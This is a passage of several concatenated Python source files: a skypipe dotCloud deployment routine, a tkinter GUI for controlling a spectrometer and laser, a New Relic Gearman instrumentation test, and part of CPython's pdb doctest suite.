return a working endpoint. If deploy is False it will not try to
deploy.
"""
if not cli.global_config.loaded:
cli.die("Please setup skypipe by running `skypipe --setup`")
try:
endpoint = lookup_endpoint(cli)
ok = client.check_skypipe_endpoint(endpoint, timeout)
if ok:
return endpoint
else:
return launch_satellite(cli) if deploy else None
except (RESTAPIError, KeyError):
return launch_satellite(cli) if deploy else None
def destroy_satellite(cli):
url = '/applications/{0}'.format(APPNAME)
try:
res = cli.user.delete(url)
except RESTAPIError:
pass
def launch_satellite(cli):
"""Deploys a new satellite app over any existing app"""
cli.info("Launching skypipe satellite:")
finish = wait_for(" Pushing to dotCloud")
# destroy any existing satellite
destroy_satellite(cli)
# create new satellite app
url = '/applications'
try:
cli.user.post(url, {
'name': APPNAME,
'flavor': 'sandbox'
})
except RESTAPIError as e:
if e.code == 409:
cli.die('Application "{0}" already exists.'.format(APPNAME))
else:
cli.die('Creating application "{0}" failed: {1}'.format(APPNAME, e))
class args: application = APPNAME
#cli._connect(args)
# push satellite code
protocol = 'rsync'
url = '/applications/{0}/push-endpoints{1}'.format(APPNAME, '')
endpoint = cli._select_endpoint(cli.user.get(url).items, protocol)
class args: path = satellite_path
cli.push_with_rsync(args, endpoint)
# tell dotcloud to deploy, then wait for it to finish
revision = None
clean = False
url = '/applications/{0}/deployments'.format(APPNAME)
response = cli.user.post(url, {'revision': revision, 'clean': clean})
deploy_trace_id = response.trace_id
deploy_id = response.item['deploy_id']
original_stdout = sys.stdout
finish = wait_for(" Waiting for deployment", finish, original_stdout)
try:
sys.stdout = StringIO()
res = cli._stream_deploy_logs(APPNAME, deploy_id,
deploy_trace_id=deploy_trace_id, follow=True)
if res != 0:
return res
except KeyboardInterrupt:
cli.error('You\'ve closed your log stream with Ctrl-C, ' \
'but the deployment is still running in the background.')
cli.error('If you aborted because of an error ' \
'(e.g. the deployment got stuck), please e-mail\n' \
'support@dotcloud.com and mention this trace ID: {0}'
.format(deploy_trace_id))
cli.error('If you want to continue following your deployment, ' \
'try:\n{0}'.format(
cli._fmt_deploy_logs_command(deploy_id)))
cli.die()
except RuntimeError:
# workaround for a bug in the current dotcloud client code
pass
finally:
sys.stdout = original_stdout
finish = wait_for(" Satellite coming online", finish)
endpoint = lookup_endpoint(cli)
ok = client.check_skypipe_endpoint(endpoint, 120)
finish.set()
time.sleep(0.1) # sigh, threads
if ok:
return endpoint
else:
cli.die("Satellite failed to come online")
|
core_ui.py
|
import tkinter as tk
from tkinter import messagebox
from tkinter import filedialog
import seabreeze
from seabreeze.spectrometers import Spectrometer
import matplotlib.pyplot as plt
import matplotlib
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import laser_control
import random
import pandas as pd
import numpy as np
import threading
import time
import interface_config
if interface_config.ON_BBB:
import Adafruit_BBIO.GPIO as GPIO # Adafruit library for safe GPIO control
else:
from debug import DummyGPIO as GPIO
from testing_utils import generate_dummy_spectra
# laser = laser_control.Laser()
root = tk.Tk()
root.resizable(0, 0)
root.title("Spectrometer Tool")
matplotlib.use("TkAgg")
device_name = tk.StringVar()
device_name.set('No Device Detected')
int_time_entry = tk.StringVar()
int_time_entry.set("100000")
int_time = int(1E5) # default integration time = 20us
trigger_mode_entry = tk.StringVar()
trigger_mode_entry.set('0')
trigger_mode = 0
collect_control = True # enable collection controls
sample_control = True # enable sampling controls
test_mode = False # activate test mode
spec = None
spec_range = None
spec_intensity = None
max_intensity_var = tk.StringVar()
max_intensity_var.set('N/A')
integration_limits_var = tk.StringVar()
integration_limits_var.set('N/A')
pixel_var = tk.StringVar()
pixel_var.set('N/A')
sample_var = tk.StringVar()
sample_var.set('N/A')
dark_count_var = tk.IntVar()
dark_count_var.set(0)
sync_fire_var = tk.IntVar()
sync_fire_var.set(0)
devices = seabreeze.spectrometers.list_devices()
# laser control variables
pulse_options = {'Continuous', 'Single Shot', 'Burst'}
pulse_mode = tk.StringVar()
pulse_mode.set('Continuous')
rep_rate_control = tk.StringVar()
rep_rate_control.set('10')
resonator_temp_var = tk.StringVar()
resonator_temp_var.set('N/A')
power_options = {'Manual', 'Low Power', 'High Power'}
power_mode = tk.StringVar()
power_mode.set('Manual')
burst_count_var = tk.StringVar()
burst_count_var.set('1000')
diode_current_var = tk.StringVar()
diode_current_var.set(0.1)
diode_current_measurement_var = tk.StringVar()
diode_current_measurement_var.set('N/A')
pulse_width_var = tk.StringVar()
pulse_width_var.set('10')
diode_trigger_options = {'Internal', 'External'}
diode_trigger_var = tk.StringVar()
diode_trigger_var.set('Internal')
# laser status vars
status_var = tk.StringVar()
status_var.set('N/A')
fet_temp_var = tk.StringVar()
fet_temp_var.set('N/A')
bank_voltage_var = tk.StringVar()
bank_voltage_var.set('N/A')
safety_control = tk.IntVar()
safety_control.set(0)
bank_target_var = tk.StringVar()
bank_target_var.set('N/A')
fet_voltage_var = tk.StringVar()
fet_voltage_var.set('N/A')
fet_drop_var = tk.StringVar()
fet_drop_var.set('N/A')
fet_src_var = tk.StringVar()
fet_src_var.set('N/A')
fig = plt.Figure(figsize=(5, 5), dpi=100)
spectra_plot = fig.add_subplot(111)
spectra_plot.set_ylabel('Intensity')
spectra_plot.set_xlabel('Wavelength [nm]')
spectra_plot.set_title('Observed Emission Spectra')
emission_data = pd.DataFrame(data=None, columns=['Wavelength [nm]', 'Intensity'])
def update_plot(): # take a fresh sample from source
global spec_range
global spec_intensity
global emission_data
dark_spec = pd.DataFrame(data=None, columns=['Wavelength [nm]', 'Intensity'])
if not devices:
ref = messagebox.askyesno('ERROR', "Error: No device detected. \nUse Testing Data?")
if ref: # refresh with sample data
emission_data = generate_dummy_spectra(central_spectra=(random.randint(300, 500), random.randint(500, 700),
random.randint(700, 900)))
spectra_plot.clear()
spectra_plot.set_ylabel('Intensity')
spectra_plot.set_xlabel('Wavelength [nm]')
spectra_plot.set_title('Observed Emission Spectra')
spectra_plot.plot(emission_data.iloc[0:, 0], emission_data.iloc[0:, 1])
canvas.draw()
else:
spec.trigger_mode(trigger_mode) # set trigger mode
spec.integration_time_micros(int_time) # set integration_time
emission_data = \
pd.DataFrame(data=np.asarray([spec.wavelengths(), spec.intensities(correct_dark_counts = (dark_count_var.get() == 1))]).transpose(),
columns=['Wavelength [nm]', 'Intensity'])
# filter data from under 300nm
emission_data = emission_data[emission_data > 300]
# update plot
spectra_plot.clear()
spectra_plot.set_ylabel('Intensity')
spectra_plot.set_xlabel('Wavelength [nm]')
spectra_plot.set_title('Observed Emission Spectra')
spectra_plot.plot(emission_data.iloc[0:, 0], emission_data.iloc[0:, 1])
canvas.draw()
# update settings bar
pixel_var.set(spec.pixels)
integration_limits_var.set(spec.integration_time_micros_limits)
max_intensity_var.set(emission_data['Intensity'].max())
def reconnect_device():
global spec
if seabreeze.spectrometers.list_devices():
spec = seabreeze.spectrometers.Spectrometer.from_first_available()
device_name.set(spec.serial_number)
else:
messagebox.showerror("ERROR", "ERROR: No Device Detected")
def save_settings():
pass
def load_settings():
pass
def export_plot():
name = filedialog.asksaveasfilename(initialdir="./",
title="Select file",
filetypes=(("PNG", "*.png"), ("all files", "*.*")),
defaultextension='.p')
if name and name != '.p':
fig.savefig(name)
def export_csv():
global emission_data
try:
name = filedialog.asksaveasfilename(initialdir="./",
title="Select file",
filetypes=(("CSV data", "*.csv"), ("all files", "*.*")),
defaultextension='.csv')
if name:
emission_data.to_csv(name, index=None, header=True)
else:
pass
except ValueError:
pass
# Laser code __________________________________________________________________________________________________________
laser_on = False
def laser_switch():
global laser_on
if not laser_on:
GPIO.output(interface_config.Laser_GPIO_pin, GPIO.LOW) # set pin LOW to disable 48V converter, and thus the laser
laser_onoff_switch['text'] = "Turn on laser"
if laser_on:
GPIO.output(interface_config.Laser_GPIO_pin, GPIO.HIGH) # set pin LOW to disable 48V converter, and thus the laser
laser_onoff_switch['text'] = "Turn off laser"
laser_on = not laser_on
def editConstants():
pulseMode = 0
if pulse_mode.get() == "Continuous":
pulseMode = 0
elif pulse_mode.get() == "Single Shot":
pulseMode = 1
elif pulse_mode.get() == "Burst":
pulseMode = 2
powerMode = 0
if power_mode.get() == 'Manual':
powerMode = 0
elif power_mode.get() == 'Low Power':
powerMode = 1
elif power_mode.get() == 'High Power':
powerMode = 2
diodeTrigger = 0
if diode_trigger_var.get() == 'Internal':
diodeTrigger = 0
elif diode_trigger_var.get() == 'External':
diodeTrigger = 1
laser.editConstants(pulseMode, rep_rate_control.get(), burst_count_var.get(), diode_current_var.get(), powerMode,
pulse_width_var.get(), diodeTrigger)
def arm_laser():
editConstants()
if laser.check_armed():
laser.disarm()
else:
laser.arm()
def fire_laser():
if sync_fire_var.get() == 1:
threading.Thread(target=update_plot)
time.sleep(.001)
laser.fire_laser()
def emergency_stop():
laser.emergency_stop()
def acquireData():
while True:
status_var.set(str(laser.get_status()))
fet_temp_var.set(str(laser.fet_temp_check()))
fet_voltage_var.set(str(laser.fet_voltage_check()))
diode_current_var.set(str(laser.diode_current_check()))
resonator_temp_var.set(str(laser.resonator_temp_check()))
time.sleep(.01)
threading.Thread(target = acquireData).start()
# Spectrometer UI ______________________________________________________________________________________________________
if not devices:
spectra_plot.plot(0, 0)
else:
spec = seabreeze.spectrometers.Spectrometer.from_first_available()
emission_data = \
pd.DataFrame(data=np.asarray([spec.wavelengths(), spec.intensities()]).transpose(),
columns=['Wavelength [nm]', 'Intensity'])
spectra_plot.plot(emission_data.iloc[0:, 0], emission_data.iloc[0:, 1])
device_name.set(spec.serial_number)
canvas = FigureCanvasTkAgg(fig, master=root)
canvas.get_tk_widget().grid(row=1, column=0, columnspan=2, rowspan=16) # plot initial data
tk.Label(root, text="Connected Device:").grid(row=0, column=0)
tk.Label(root, textvariable=device_name, bg="White", relief=tk.GROOVE).grid(row=0, column=1, sticky="NSEW")
reconnect = tk.Button(root, text="Reconnect Device", command=reconnect_device)
reconnect.grid(row=0, column=2, columnspan=2, sticky="NSEW")
reconnect.config(state=tk.DISABLED)
tk.Label(text="Sampling Controls", relief=tk.GROOVE).grid(row=1, columnspan=2, column=2, sticky="NSEW")
tk.Label(root, text="Integration Time [μs]", relief=tk.GROOVE).grid(row=2, column=2, sticky="NSEW")
int_entry = tk.Entry(textvariable=int_time_entry, relief=tk.FLAT, bg="white")
int_entry.grid(row=2, column=3, sticky="NSEW")
tk.Label(root, text="Trigger Mode", relief=tk.GROOVE).grid(row=3, column=2, sticky="NSEW")
trigger_entry = tk.Entry(root, textvariable=trigger_mode_entry, relief=tk.FLAT, bg="white")
trigger_entry.grid(row=3, column=3, sticky="NSEW")
tk.Checkbutton(root, text="Dark Spectra Subtraction", variable=dark_count_var, relief=tk.FLAT)\
.grid(row=4, column=2, sticky="NSEW")
tk.Checkbutton(root, text="Synchronize Laser", variable=sync_fire_var, relief=tk.FLAT)\
.grid(row=4, column=3, sticky="NSEW")
refresh = tk.Button(root, text="Acquire Sample", command=update_plot)
refresh.grid(row=5, column=2, columnspan=2, sticky="NSEW")
tk.Label(root, text="Current Status", relief=tk.GROOVE).grid(row=6, column=2, columnspan=2, sticky="NSEW")
tk.Label(root, text="Max Intensity", relief=tk.GROOVE).grid(row=7, column=2, sticky="NSEW")
tk.Label(root, textvariable=max_intensity_var, bg='gray', relief=tk.FLAT).grid(row=7, column=3, sticky="NSEW")
tk.Label(root, text="Integration Bounds", relief=tk.GROOVE).grid(row=8, column=2, sticky="NSEW")
tk.Label(root, textvariable=integration_limits_var, bg='gray', relief=tk.FLAT).grid(row=8, column=3, sticky="NSEW")
tk.Label(root, text="Pixel Count", relief=tk.GROOVE).grid(row=9, column=2, sticky="NSEW")
tk.Label(root, textvariable=pixel_var, bg='gray', relief=tk.FLAT).grid(row=9, column=3, sticky="NSEW")
tk.Label(root, text="Sample Count", relief=tk.GROOVE).grid(row=10, column=2, sticky="NSEW")
tk.Label(root, textvariable=sample_var, bg='gray', relief=tk.FLAT).grid(row=10, column=3, sticky="NSEW")
img_button = tk.Button(root, text='Export Image', command=export_plot)
img_button.grid(row=11, column=2, columnspan=2, sticky="NSEW")
csv_button = tk.Button(root, text='Export CSV', command=export_csv)
csv_button.grid(row=12, column=2, columnspan=2, sticky="NSEW")
# laser control UI______________________________________________________________________________________________________
tk.Button(root, text=" ", state=tk.DISABLED).grid(row=0, column=4, rowspan=18, sticky="NSEW") # divider
tk.Label(root, text="Laser Controls", relief=tk.FLAT).grid(row=0, column=5, columnspan=2, sticky="NSEW")
tk.Label(text="Pulse Control", relief=tk.GROOVE).grid(row=1, columnspan=2, column=5, sticky="NSEW")
tk.Label(text="Pulse Mode", relief=tk.GROOVE).grid(row=2, column=5, sticky="NSEW")
tk.OptionMenu(root, pulse_mode, *pulse_options).grid(row=2, column=6, sticky="NSEW")
tk.Label(text="Rep Rate", relief=tk.GROOVE).grid(row=3, column=5, sticky="NSEW")
tk.Entry(relief=tk.FLAT, bg="white", textvariable=rep_rate_control).grid(row=3, column=6, sticky="NSEW")
tk.Label(text="Burst Count", relief=tk.GROOVE).grid(row=4, column=5, sticky="NSEW")
tk.Entry(relief=tk.FLAT, bg="white", textvariable=burst_count_var).grid(row=4, column=6, sticky="NSEW")
tk.Label(text="Diode Settings", relief=tk.GROOVE).grid(row=5, column=5, columnspan=2, sticky="NSEW")
tk.Label(text="Diode Current", relief=tk.GROOVE).grid(row=6, column=5, sticky="NSEW")
tk.Entry(relief=tk.FLAT, bg="white", textvariable=diode_current_var).grid(row=6, column=6, sticky="NSEW")
tk.Label(text="Energy Mode", relief=tk.GROOVE).grid(row=7, column=5, sticky="NSEW")
tk.OptionMenu(root, power_mode, *power_options).grid(row=7, column=6, sticky="NSEW")
tk.Label(text="Diode Pulse Width", relief=tk.GROOVE).grid(row=8, column=5, sticky="NSEW")
tk.Entry(relief=tk.FLAT, bg="white", textvariable=pulse_width_var).grid(row=8, column=6, sticky="NSEW")
tk.Label(text="Diode Trigger", relief=tk.GROOVE).grid(row=9, column=5, sticky="NSEW")
tk.OptionMenu(root, diode_trigger_var, *diode_trigger_options).grid(row=9, column=6, sticky="NSEW")
# tk.OptionMenu(root, diode_trigger_var, *diode_trigger_options).grid(row=9, column=6, sticky="NSEW")
tk.Label(text="Laser Controls", relief=tk.GROOVE).grid(row=10, column=5, columnspan=2, sticky="NSEW")
tk.Label(text="Arm Laser", relief=tk.GROOVE).grid(row=11, column=5, sticky="NSEW")
arm = tk.Button(text='Arm', command = arm_laser)
arm.grid(row=11, column=6, sticky="NSEW")
tk.Label(text="Laser Status", relief=tk.GROOVE).grid(row=12, column=5, sticky="NSEW")
laser_status = tk.Label(textvariable=status_var, relief=tk.FLAT, bg='gray')
laser_status.grid(row=12, column=6, sticky="NSEW")
edit_constants = tk.Button(text = "Edit constants", command = editConstants)
edit_constants.grid(row=13, column=5, columnspan=2, rowspan=7, sticky="NSEW")
laser_onoff_switch = tk.Button(text='Turn on laser', bg='red', command = laser_switch)
laser_onoff_switch.grid(row=11, column=7, columnspan=2, rowspan=2, sticky="NSEW")
emergency_stop_control = tk.Button(text='Stop fire', bg='red', command = emergency_stop)
emergency_stop_control.grid(row=13, column=7, columnspan=2, rowspan=1, sticky="NSEW")
fire_control = tk.Button(text='Fire', bg='red', command = fire_laser)
fire_control.grid(row=14, column=7, columnspan=2, rowspan=1, sticky="NSEW")
tk.Label(root, text="Laser Status", relief=tk.FLAT).grid(row=0, column=7, columnspan=2, sticky="NSEW")
tk.Label(root, text="Thermals", relief=tk.GROOVE).grid(row=1, column=7, columnspan=2, sticky="NSEW")
tk.Label(root, text="Resonator [°C]", relief=tk.GROOVE).grid(row=2, column=7, sticky="NSEW")
tk.Label(root, textvariable=resonator_temp_var, bg="Gray", relief=tk.FLAT).grid(row=2, column=8, sticky="NSEW")
tk.Label(root, text="FET [°C]", relief=tk.GROOVE).grid(row=3, column=7, sticky="NSEW")
tk.Label(root, textvariable=fet_temp_var, bg="Gray", relief=tk.FLAT).grid(row=3, column=8, sticky="NSEW")
"""
Heaters are not used
heater_target_var = tk.StringVar()
heater_target_var.set('N/A')
tk.Label(root, text="Heater Target [°C]", relief=tk.GROOVE).grid(row=4, column=7, sticky="NSEW")
tk.Label(root, textvariable=heater_target_var, bg="Gray", relief=tk.FLAT).grid(row=4, column=8, sticky="NSEW")
heater_temp_var = tk.StringVar()
heater_temp_var.set('N/A')
tk.Label(root, text="Heater Temp", relief=tk.GROOVE).grid(row=5, column=7, sticky="NSEW")
tk.Label(root, textvariable=heater_temp_var, bg="Gray", relief=tk.FLAT).grid(row=5, column=8, sticky="NSEW")
"""
tk.Label(root, text="Voltage", relief=tk.GROOVE).grid(row=4, column=7, columnspan=2, sticky="NSEW")
# Unused
tk.Label(root, text="Bank Voltage", relief=tk.GROOVE).grid(row=5, column=7, sticky="NSEW")
tk.Label(root, textvariable=bank_voltage_var, bg="Gray", relief=tk.FLAT).grid(row=5, column=8, sticky="NSEW")
# Unused
tk.Label(root, text="Target Bank Voltage", relief=tk.GROOVE).grid(row=6, column=7, sticky="NSEW")
tk.Label(root, textvariable=bank_target_var, bg="Gray", relief=tk.FLAT).grid(row=6, column=8, sticky="NSEW")
tk.Label(root, text="FET Voltage", relief=tk.GROOVE).grid(row=7, column=7, sticky="NSEW")
tk.Label(root, textvariable=fet_voltage_var, bg="Gray", relief=tk.FLAT).grid(row=7, column=8, sticky="NSEW")
tk.Label(root, text="Diode Current", relief=tk.GROOVE).grid(row=8, column=7, sticky="NSEW")
tk.Label(root, textvariable=diode_current_measurement_var, bg="Gray", relief=tk.FLAT).grid(row=8, column=8, sticky="NSEW")
# Unused
fet_drain_var = tk.StringVar()
fet_drain_var.set('N/A')
tk.Label(root, text="FET Drain", relief=tk.GROOVE).grid(row=9, column=7, sticky="NSEW")
tk.Label(root, textvariable=fet_drain_var, bg="Gray", relief=tk.FLAT).grid(row=9, column=8, sticky="NSEW")
# Unused
tk.Label(root, text="FET Source", relief=tk.GROOVE).grid(row=10, column=7, sticky="NSEW")
tk.Label(root, textvariable=fet_src_var, bg="Gray", relief=tk.FLAT, width=10).grid(row=10, column=8, sticky="NSEW")
def update_integration_time(a, b, c):
global int_time
if not int_time_entry:
int_entry.config(bg='red')
else:
try:
t = int(int_time_entry.get())
if t:
int_time = t
int_entry.config(bg="white")
else:
int_entry.config(bg="red")
except ValueError:
int_entry.config(bg="red")
def update_trigger_mode(a, b, c):
global trigger_mode
if not trigger_mode_entry:
trigger_entry.config(bg='red')
else:
try:
t = int(trigger_mode_entry.get())
if t in range(0, 4):
trigger_mode = t
trigger_entry.config(bg='white')
else:
trigger_entry.config(bg='red')
except ValueError:
trigger_entry.config(bg='red')
trigger_mode_entry.trace_variable('w', update_trigger_mode)
int_time_entry.trace_variable('w', update_integration_time)
update_plot()
root.mainloop()
|
test_gearman.py
|
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import threading
import gearman
from newrelic.api.background_task import background_task
worker_thread = None
worker_event = threading.Event()
gm_client = None
GEARMAND_HOST = os.environ.get("GEARMAND_PORT_4730_TCP_ADDR", "localhost")
GEARMAND_PORT = os.environ.get("GEARMAND_PORT_4730_TCP_PORT", "4730")
GEARMAND_ADDR = "%s:%s" % (GEARMAND_HOST, GEARMAND_PORT)
class GearmanWorker(gearman.GearmanWorker):
def after_poll(self, any_activity):
try:
worker_event_set = worker_event.is_set()
except TypeError:
worker_event_set = worker_event.isSet()
return not worker_event_set
def setup_module(module):
global worker_thread
gm_worker = GearmanWorker([GEARMAND_ADDR])
def task_listener_reverse(gearman_worker, gearman_job):
return "".join(reversed(gearman_job.data))
def task_listener_exception(gearman_worker, gearman_job):
raise RuntimeError("error")
gm_worker.set_client_id("gearman-instrumentation-tests")
gm_worker.register_task("reverse", task_listener_reverse)
gm_worker.register_task("exception", task_listener_exception)
def startup():
gm_worker.work(poll_timeout=1.0)
worker_thread = threading.Thread(target=startup)
worker_thread.start()
global gm_client
gm_client = gearman.GearmanClient([GEARMAND_ADDR])
def teardown_module(module):
worker_event.set()
worker_thread.join()
@background_task()
def test_successful():
completed_job_request = gm_client.submit_job("reverse", "data")
assert completed_job_request.complete
@background_task()
def test_exception():
completed_job_request = gm_client.submit_job("exception", "data")
assert completed_job_request.complete
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[2]>(18)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
... 'source fooxxx', # something that doesn't exit
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
